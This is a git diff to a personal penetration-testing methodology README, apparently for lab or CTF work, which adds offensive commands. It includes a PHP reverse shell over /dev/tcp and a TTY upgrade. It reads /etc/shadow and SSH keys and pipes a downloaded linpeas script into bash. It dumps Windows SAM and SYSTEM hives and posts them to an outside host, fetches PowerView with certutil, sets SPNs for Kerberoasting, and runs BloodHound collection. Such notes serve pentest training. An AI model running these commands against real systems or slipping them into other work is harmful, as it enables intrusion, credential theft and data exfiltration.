--- a/README
+++ b/README
@@ -1,14 +1,17 @@
 My Methodology
 
+
 Host Discovery (External)
 ━━━━━━━━━━━━━━━━━━━━━━━━━
 fping -ag 10.10.110.0/24 2>/dev/null | tee external-ips ; \
 for ip in $(cat external-ips); do nmap=$(nmap -p- --max-retries 1 --min-rate 10000 --open "$ip" | grep -vE 'Warning:|filtered|latency|Starting'); echo "$nmap"; ports=$(echo "$nmap" | sed -n 's|/.*||p' | paste -sd ','); echo "nmap -sC -sV -Pn -p$ports $ip"; echo; done
 
+
 Host Discovery (Internal)
 ━━━━━━━━━━━━━━━━━━━━━━━━━
 fping -ag 172.16.1.0/24 2>/dev/null | tee internal-ips ; \
 for ip in $(cat internal-ips); do nmap=$(nmap -p- --max-retries 1 --min-rate 10000 --open "$ip" | grep -vE 'Warning:|filtered|latency|Starting'); echo "$nmap"; ports=$(echo "$nmap" | sed -n 's|/.*||p' | paste -sd ','); echo "nmap -sC -sV -Pn -p$ports $ip"; echo; done
+
 
 Service Enumeration
 ━━━━━━━━━━━━━━━━━━━━━━━━━
@@ -28,6 +31,7 @@ for x in $(showmount -e 172.16.1.10 | awk '{print $1}' | grep -v 'Export')
     sudo mount -t nfs 172.16.1.10:"$x" "/dev/shm"/mnt"$x" -o nolock
     tree -puga "/dev/shm"/mnt"$x"
 done
+
 
 Web Enumeration
 ━━━━━━━━━━━━━━━━━━━━━━━━━
@@ -55,9 +59,35 @@ gobuster vhost --append-domain -u example.com -k -r -t200 -q \
 -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt \
 | grep -oP '(?<=Found: )[^ ]+'
 
+
 Exploitation
 ━━━━━━━━━━━━━━━━━━━━━━━━━
+[*] Reverse Shells
+<?php
+$lhost = "10.10.16.3";
+$lport = 4444;
+
+exec("bash -c 'bash -i >& /dev/tcp/$lhost/$lport 0>&1'");
+$sock = fsockopen($lhost, $lport);
+if ($sock) {
+    exec("sh <&3 >&3 2>&3");
+}
+?>
+
+[*] Upgrade TTY
+python3 -c 'import pty; pty.spawn("/bin/bash")';
+CTRL-Z
+stty size;stty raw -echo;fg
+export SHELL=bash;
+export TERM=xterm-256color;
+stty rows <num> columns <num>
+reset
+
+
+Post Exploitation
+━━━━━━━━━━━━━━━━━━━━━━━━━
 [*] Linux
+ssh user@xxxxxxxxx -i id_rsa -L 33060:localhost:33060
 netstat -tuln
 ls -la /opt
 sudo -l
@@ -66,6 +96,7 @@ grep -r -E 'conf' /var/www
 cat ~/.ssh/id_rsa
 cat /etc/shadow
 curl xxxxxxxxxx:8088/linpeas.sh | bash
+GTFO bins
 
 [*] Windows
 evil-winrm -i xxxxxxxxxx -u 'username' -p 'password'
@@ -81,3 +112,22 @@ URL=C:\programdata\shell.bat
 
 meterpreter > use priv
 meterpreter > getsystem
+
+nxc winrm xxxxxxxxxx -u 'username' -p 'password' -x \
+'
+powershell -c rm *.SAV
+powershell -c reg save HKLM\SYSTEM SYSTEM.SAV
+powershell -c reg save HKLM\SAM SAM.SAV
+powershell -c compress-archive *.SAV SAM.zip
+powershell -c dir
+iwr http://xxxxxxxxxx:xxxx -Method POST -InFile SAM.zip
+'; unzip -o SAM.zip; \
+impacket-secretsdump LOCAL -sam SAM.SAV -system SYSTEM.SAV
+
+powershell -c "certutil -urlcache -f http://xxxxxxxxxx:8088/powerview.ps1 C:\programdata\powerview.ps1"
+powershell Import-Module C:\programdata\powerview.ps1
+Get-NetDomain
+Get-LocalUser
+Set-DomainObject -Identity USERNAME -SET @{serviceprincipalname='SET/SET'}; Get-DomainSPNTicket -spn SET/SET
+bloodhound-python -c all -u 'username' -p 'password' -d "$domain" -dc "$dc" -ns "$target"
+bloodhound-python -c default -u 'username' -p 'password' -d "$domain" -dc "$dc" -ns "$target"
